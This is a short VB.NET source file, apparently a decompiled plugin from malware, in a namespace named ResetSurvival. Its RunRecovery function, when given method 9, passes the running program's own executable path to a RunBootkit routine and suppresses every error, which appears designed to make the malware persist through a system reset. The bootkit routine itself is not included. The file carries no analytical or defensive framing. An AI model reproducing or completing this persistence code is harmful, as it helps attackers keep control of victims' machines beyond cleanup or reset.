22 lines
496 B
VB.net
22 lines
496 B
VB.net
Imports System
|
|
Imports System.Diagnostics
|
|
Imports Microsoft.VisualBasic
|
|
|
|
Namespace ResetSurvival
|
|
Public Class Plugin
|
|
Public Shared Function RunRecovery(Method As Integer) As String
|
|
Dim text As String
|
|
Try
|
|
Select Case Method
|
|
Case 9
|
|
ResetSurvival.RunBootkit(Process.GetCurrentProcess().MainModule.FileName)
|
|
End Select
|
|
text = Nothing
|
|
Catch ex As Exception
|
|
text = Nothing
|
|
End Try
|
|
Return text
|
|
End Function
|
|
End Class
|
|
End Namespace
|